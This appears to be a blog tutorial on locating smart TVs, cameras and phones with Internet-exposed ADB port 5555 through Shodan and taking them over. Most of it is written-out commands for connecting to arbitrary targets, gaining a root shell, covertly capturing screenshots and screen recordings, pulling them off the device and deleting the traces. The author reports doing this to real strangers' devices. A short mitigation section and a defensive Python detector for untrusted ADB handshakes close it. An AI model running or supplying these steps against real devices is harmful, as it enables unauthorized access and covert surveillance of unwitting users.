Getting Shell Access to ADB Exposed Smart Devices 📲📺⌚

Exploiting exposed ADB ports to get shell access to various smart devices such as smart TVs, cameras, etc.

Introduction

ADB is widely used by Android developers to debug Android apps and to perform several other tasks, such as pushing/pulling files between an Android device and a PC, installing applications, enabling/disabling verity checks, executing commands, rooting the device, etc.

I love the CLI, so I prefer CLI commands over a UI, and ADB gives me shell access where I can run commands. It can also listen on a TCP port so that users can connect over the LAN, but what if that local port is somehow exposed to the Internet, allowing anyone to connect to the device via the exposed ADB port 5555?

Since Android is an open source project, most companies build their own custom Android images to drive their products. There is a high chance that a smart device is running Android, or a variant of it, that supports ADB connections.

Can a malicious user connect to such an exposed device?

Using Shodan To Find Exposed Devices

https://www.shodan.io/search?query=%22Android+Debug+Bridge%3A%22

There are many devices connected to the Internet with an exposed ADB port. Most of them are misconfigured, allowing anyone to connect to them.

Installing ADB Tools For Connecting To A Remote Device

Install the ADB tools on a Debian-based distro:

$ sudo apt install android-tools-adb -y

Start the server and connect to the device:

$ adb start-server

# adb connect [IP]:[PORT]
$ adb connect [TARGET_IP]:5555

# list devices
$ adb devices
List of devices attached
[redacted]:5555      device

Some devices don't accept the connection. Try another IP if you're unable to connect to the device.

I successfully got shell access to one of the exposed devices.

Getting shell access is one of the basic steps for pivoting: once attackers get a shell, they usually try to escalate privileges on the device and then compromise other devices on the network. Even without that, an attacker can still damage the system by uploading a malicious/spyware application. As a PoC I'll be capturing the user's screen using shell access.

Let's try to find rooted devices on the Internet. A rooted device gives the attacker complete control over it.

# connecting to target machine
$ adb connect [TARGET_IP]:5555

# restart adbd as root (only works on builds that allow it; production builds refuse)
$ adb -s [TARGET_IP]:5555 root

# getting root shell access to the device
$ adb -s [TARGET_IP]:5555 shell

Got a Device with Root Access 🎉

Capturing Screenshots and Recording Screen

Capturing a Screenshot and Storing It on the Attacker's Machine

$ adb -s [TARGET]:5555 exec-out screencap -p > screen.png

The image will be stored in the current directory as screen.png.

Recording the Screen and Pulling the File to the Local Machine

# record the screen for 10 seconds (screenrecord runs on the device, so it goes through adb shell)
$ adb -s [device_ip]:5555 shell screenrecord --time-limit 10 /sdcard/recorded.mp4

# download file
$ adb -s [device_ip]:5555 pull /sdcard/recorded.mp4

# delete the file from the device
$ adb -s [device_ip]:5555 shell rm /sdcard/recorded.mp4

The above commands record the screen for 10 s, download the file to the current working directory on the local machine, then delete it from the device.

Screenshots Captured Using the Above Commands

The images above were captured over ADB from devices exposed to the Internet, whose users were browsing the web, watching shows, playing games, etc. But I also encountered a ransomware-infected machine asking the victim for $100 to a bitcoin address.

Since the ADB port is exposed to the Internet, anyone can connect to the device over the Internet and install a ransomware application.

Searching for "Nanoware Ransomware", I couldn't find any traces of such ransomware on the Internet. We cannot trust messages saying "SORRY I have to feed my family", since this could be a social engineering technique luring the victim into paying a low-value ransom. But I think this attack wasn't carried out by a ransomware gang; it is more likely an individual, or possibly an early stage of a gang experimenting with something.

Conclusion

There are many devices connected to the Internet with ADB exposed, allowing an attacker to connect, execute commands, install applications, capture the screen, etc. Most of these devices are Smart TVs, Smart TV boxes, smartphones and smart cameras.

Users should turn ADB off again after use. Devices with the ADB port open shouldn't be exposed to the Internet; individuals should use a VPN such as WireGuard/OpenVPN to create a secure network and connect to the device remotely.
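As an added example (not from the original post), here is a small Python detector for the network side of this problem: it parses the ADB wire-protocol handshake (the CNXN message that `adb connect` sends first) and flags handshakes to port 5555 that arrive from outside an assumed trusted home network. The trusted ranges, the sample addresses and the sample packet are constructed assumptions; the rule is meant to run where the real source address is visible, e.g. on the router or a perimeter sensor.

```python
import ipaddress
import struct

# ADB wire-protocol header: six little-endian uint32 fields
# (command, arg0, arg1, data_length, data_check, magic), 24 bytes in total.
ADB_HEADER = struct.Struct("<6I")
ADB_CNXN = 0x4E584E43  # the bytes b"CNXN" read as a little-endian uint32
ADB_TCP_PORT = 5555

# Assumption: the home/lab network where adb-over-TCP is legitimately used.
TRUSTED_NETS = [ipaddress.ip_network("192.168.0.0/16"),
                ipaddress.ip_network("10.0.0.0/8")]


def parse_adb_message(raw: bytes):
    """Parse one ADB message; return a dict, or None if it is not well-formed."""
    if len(raw) < ADB_HEADER.size:
        return None
    command, arg0, arg1, length, check, magic = ADB_HEADER.unpack_from(raw)
    if magic != command ^ 0xFFFFFFFF:  # magic is the bitwise inverse of command
        return None
    payload = raw[ADB_HEADER.size:ADB_HEADER.size + length]
    if len(payload) != length or (sum(payload) & 0xFFFFFFFF) != check:
        return None  # truncated or corrupted payload
    return {"command": command, "arg0": arg0, "arg1": arg1, "payload": payload}


def is_untrusted_adb_connect(src_ip: str, dst_port: int, raw: bytes) -> bool:
    """True when an ADB CNXN handshake to port 5555 comes from outside TRUSTED_NETS."""
    if dst_port != ADB_TCP_PORT:
        return False
    msg = parse_adb_message(raw)
    if msg is None or msg["command"] != ADB_CNXN:
        return False
    src = ipaddress.ip_address(src_ip)
    return not any(src in net for net in TRUSTED_NETS)


def build_cnxn(payload: bytes) -> bytes:
    """Constructed CNXN message (version 0x01000000, maxdata 1 MiB), used to exercise the parser offline."""
    return ADB_HEADER.pack(ADB_CNXN, 0x01000000, 0x00100000, len(payload),
                           sum(payload) & 0xFFFFFFFF, ADB_CNXN ^ 0xFFFFFFFF) + payload


if __name__ == "__main__":
    # Constructed flows: one from the LAN, one from a documentation (TEST-NET-3) address.
    probe = build_cnxn(b"host::\x00")
    print(is_untrusted_adb_connect("192.168.1.20", 5555, probe))  # False
    print(is_untrusted_adb_connect("203.0.113.7", 5555, probe))   # True
```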
